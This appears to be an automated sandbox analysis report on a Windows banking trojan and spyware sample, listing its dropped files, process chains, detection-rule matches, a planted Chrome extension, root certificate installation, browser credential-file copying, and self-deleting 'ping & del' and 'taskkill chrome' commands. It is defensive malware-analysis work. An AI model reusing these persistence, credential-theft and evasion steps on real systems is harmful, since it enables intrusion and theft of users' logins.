Dropped File: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe 6D2DB66A98EC5730BDCBC41DC7C78210FE24FE48BF7E44B59AB01C2084900456

Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Code function: String function: 10010534 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Code function: String function: 10010534 appears 35 times

Source: 1611971443428.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 1611971443428.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: Cyfj6XGbkd.exe, 00000000.00000000.221272611.0000000000412000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameVBCABLE_ControlPanel.exeJ vs Cyfj6XGbkd.exe
Source: Cyfj6XGbkd.exe, 00000000.00000002.243942106.00000000022D0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamenlsbres.dllj% vs Cyfj6XGbkd.exe
Source: Cyfj6XGbkd.exe, 00000000.00000002.243947116.00000000022E0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamenlsbres.dll.muij% vs Cyfj6XGbkd.exe
Source: Cyfj6XGbkd.exe, 00000000.00000002.243964941.00000000022F0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemswsock.dll.muij% vs Cyfj6XGbkd.exe
Source: Cyfj6XGbkd.exe	Binary or memory string: OriginalFilenameVBCABLE_ControlPanel.exeJ vs Cyfj6XGbkd.exe

Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll

Source: Cyfj6XGbkd.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 00000000.00000002.244341295.0000000002880000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000002.00000002.333865446.00000000026F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.261783876.0000000002620000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 2.2.56BB1610C0318054.exe.26f0000.5.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.Cyfj6XGbkd.exe.2880000.5.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 2.2.56BB1610C0318054.exe.10000000.7.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.Cyfj6XGbkd.exe.10000000.6.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 2.2.56BB1610C0318054.exe.26f0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.56BB1610C0318054.exe.10000000.7.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.56BB1610C0318054.exe.2620000.5.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.56BB1610C0318054.exe.2620000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.Cyfj6XGbkd.exe.2880000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 2.2.56BB1610C0318054.exe.32a0000.6.unpack, type: UNPACKEDPE	Matched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: 4.2.56BB1610C0318054.exe.30f0000.6.unpack, type: UNPACKEDPE	Matched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html

Source: classification engine

Classification label: mal93.bank.troj.spyw.evad.winEXE@34/38@4/3

Source: C:\Users\user\AppData\Roaming\1611971443428.exe

Code function: 8_2_0040CE93 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,Process32NextW,FindCloseChangeNotification,

Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe

Code function: 28_2_00F41058 CoCreateInstance,

Source: C:\Users\user\AppData\Roaming\1611971443428.exe

Code function: 8_2_0040D9FC FindResourceW,SizeofResource,LoadResource,LockResource,

Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe

File created: C:\Users\user\AppData\Local\Login Data1611971442537

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:6436:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2148:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5628:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7072:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello002
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello001
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5564:120:WilError_01
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign__install_r3

Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe

File created: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe

Jump to behavior

Source: Cyfj6XGbkd.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Roaming\1611971443428.exe

System information queried: HandleInformation

Source: C:\Windows\SysWOW64\taskkill.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")

Source: C:\Windows\SysWOW64\msiexec.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: Cyfj6XGbkd.exe	Virustotal: Detection: 40%
Source: Cyfj6XGbkd.exe	Metadefender: Detection: 24%
Source: Cyfj6XGbkd.exe	ReversingLabs: Detection: 58%

Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe

File read: C:\Users\user\Desktop\Cyfj6XGbkd.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Cyfj6XGbkd.exe 'C:\Users\user\Desktop\Cyfj6XGbkd.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe 0011 user01
Source: unknown	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding F759AAE600C1266B09FA365BCB174CA6 C
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe 200 user01
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\Cyfj6XGbkd.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknown	Process created: C:\Users\user\AppData\Roaming\1611971443428.exe 'C:\Users\user\AppData\Roaming\1611971443428.exe' /sjson 'C:\Users\user\AppData\Roaming\1611971443428.txt'
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill /f /im chrome.exe
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknown	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Process created: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe 0011 user01
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Process created: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe 200 user01
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\Cyfj6XGbkd.exe'
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Process created: C:\Users\user\AppData\Roaming\1611971443428.exe 'C:\Users\user\AppData\Roaming\1611971443428.exe' /sjson 'C:\Users\user\AppData\Roaming\1611971443428.txt'
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Process created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe'
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill /f /im chrome.exe
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3

Source: C:\Windows\SysWOW64\msiexec.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{000C103E-0000-0000-C000-000000000046}\InProcServer32

Source: C:\Windows\SysWOW64\msiexec.exe	Automated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exe	Automated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exe	Automated click: Install

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: Cyfj6XGbkd.exe

Static file information: File size 4247224 > 1048576

Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe

File opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll

Source:	Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb source: MiniThunderPlatform.exe.2.dr
Source:	Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: 1611971443428.exe, 00000008.00000000.254487311.000000000040F000.00000002.00020000.sdmp, 1611971443428.exe.2.dr
Source:	Binary string: atl71.pdbT source: atl71.dll.2.dr
Source:	Binary string: msvcr71.pdb\ source: msvcr71.dll.2.dr
Source:	Binary string: cmd_insert_server.icex-conference/x-cooltalk.movievideo/x-sgi-movievideo/x-msvideo.mxuvideo/vnd.mpegurl.qtvideo/quicktimevideo/mpeg.xmltext/xml.etxtext/x-setext.wmlstext/vnd.wap.wmlscript.wmltext/vnd.wap.wml.tsvtext/tab-separated-values.sgmtext/sgml.rtftext/rtf.rtxtext/richtext.txttext/plain.html.csstext/css.mshmodel/mesh.igsmodel/iges.xwdimage/x-xwindowdump.xpmimage/x-xpixmap.xbmimage/x-xbitmap.rgbimage/x-rgb.ppmimage/x-portable-pixmap.bgmimage/x-portable-graymap.pbmimage/x-portable-bitmap.pnmimage/x-portable-anymap.rasimage/x-cmu-raster.wbmpimage/vnd.wap.wbmp.djvimage/vnd.djvu.tiffimage/tiff.pngimage/png.jpgimage/jpeg.iefimage/ief.gifimage/gif.bmpimage/bmp.xyzchemical/x-xyz.pdbchemical/x-pdb.wavaudio/x-wavaudio/x-realaudio.arpmaudio/x-pn-realaudio-pluginaudio/x-pn-realaudio.m3uaudio/x-mpegurl.aifaudio/x-aiffaudio/mpeg.midiaudio/midiapplication/application/zip.xhtmlapplication/xhtml+xml.srcapplication/x-wais-source.ustarapplication/x-ustar.msapplication/x-troff-ms.meapplication/x-troff-me.manapplication/x-troff-man.texiapplication/x-texinfo.texapplication/x-tex.tclapplication/x-tclapplication/x-tar.sv4crcapplication/x-sv4crc.sv4cpioapplication/x-sv4cpio.sitapplication/x-stuffit.swfapplication/x-shockwave-flash.sharapplication/x-shar.shapplication/x-sh.latexapplication/x-latex.jsapplication/x-javascript.hdfapplication/x-hdf.gtarapplication/x-gtar.splapplication/x-futuresplash.dviapplication/x-dvi.cshapplication/x-csh.cpioapplication/x-cpio.pgnapplication/x-chess-pgn.vcdapplication/x-cdlink.bcpioapplication/x-bcpio.wmlscapplication/vnd.wap.wmlscriptc.wmlcapplication/vnd.wap.wmlc.wbxmlapplication/vnd.wap.wbxml.pptapplication/vnd.ms-powerpoint.xlsapplication/vnd.ms-excel.mifapplication/vnd.mif.smiapplication/smil.pdfapplication/pdf.odaapplication/oda.docapplication/msword.cptapplication/mac-compactpro.hqxapplication/mac-binhex40.ezapplication/andrew-inset source: download_engine.dll.2.dr
Source:	Binary string: d:\MiniDownloadLib\branches\bin\Product Release\download_engine.pdb source: download_engine.dll.2.dr
Source:	Binary string: atl71.pdb source: atl71.dll.2.dr
Source:	Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp
Source:	Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdbt source: MiniThunderPlatform.exe.2.dr
Source:	Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: xldl.dll.2.dr
Source:	Binary string: msvcp71.pdb source: msvcp71.dll.2.dr
Source:	Binary string: e:\xl7\Product Release\dl_peer_id.pdb0 source: dl_peer_id.dll.2.dr
Source:	Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp
Source:	Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 0000001C.00000000.316118028.0000000000F4C000.00000002.00020000.sdmp, ThunderFW.exe.2.dr
Source:	Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp
Source:	Binary string: e:\xl7\Product Release\dl_peer_id.pdb source: dl_peer_id.dll.2.dr
Source:	Binary string: msvcr71.pdb source: msvcr71.dll.2.dr
Source:	Binary string: d:\BranchAI\launcher\Release\fileLauncher.pdb source: MSIB2E9.tmp.1.dr

Data Obfuscation:

Detected unpacking (creates a PE file in dynamic memory)

Show sources

Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Unpacked PE file: 0.2.Cyfj6XGbkd.exe.2880000.5.unpack
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Unpacked PE file: 4.2.56BB1610C0318054.exe.2620000.5.unpack

Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe

Code function: 0_2_00408D68 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

Source: Cyfj6XGbkd.exe	Static PE information: real checksum: 0xd69e9 should be: 0x41116d
Source: MSIB2E9.tmp.1.dr	Static PE information: real checksum: 0x0 should be: 0x2d22
Source: 56BB1610C0318054.exe.0.dr	Static PE information: real checksum: 0xd69e9 should be: 0x41116d

Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Code function: 0_2_004038A0 push eax; ret
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Code function: 0_2_10010579 push ecx; ret
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 1_2_050AE024 push 00000078h; ret
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 1_2_079BF4DC pushad ; iretd
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 1_2_079BDD50 push 00000078h; ret
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 1_2_07A3F664 push 4801013Bh; retf
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Code function: 2_3_0311EDF7 push es; retf
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Code function: 2_2_10010579 push ecx; ret
Source: C:\Users\user\AppData\Roaming\1611971443428.exe	Code function: 8_2_0040E2F1 push ecx; ret
Source: C:\Users\user\AppData\Roaming\1611971443428.exe	Code function: 8_2_0040E340 push eax; ret
Source: C:\Users\user\AppData\Roaming\1611971443428.exe	Code function: 8_2_0040E340 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 28_2_00F43FB5 push ecx; ret

Persistence and Installation Behavior:

Contains functionality to infect the boot sector

Show sources

Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,FindCloseChangeNotification, \\.\PhysicalDrive%d
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d

Installs new ROOT certificates

Show sources

Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD Blob

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	File created: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	File created: C:\Users\user\AppData\Roaming\1611971443428.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	File created: C:\Users\user\AppData\Local\Temp\download\download_engine.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	File created: C:\Users\user\AppData\Local\Temp\download\msvcp71.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	File created: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	File created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	File created: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	File created: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	File created: C:\Users\user\AppData\Local\Temp\download\zlib1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	File created: C:\Users\user\AppData\Local\Temp\download\atl71.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	File created: C:\Users\user\AppData\Local\Temp\xldl.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSIB2E9.tmp	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihkencjepjngjffalaohcbnbeejhnoei	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihkencjepjngjffalaohcbnbeejhnoei\1.0.0.0_0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihkencjepjngjffalaohcbnbeejhnoei\1.0.0.0_0\icon.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihkencjepjngjffalaohcbnbeejhnoei\1.0.0.0_0\icon48.png	Jump to behavior
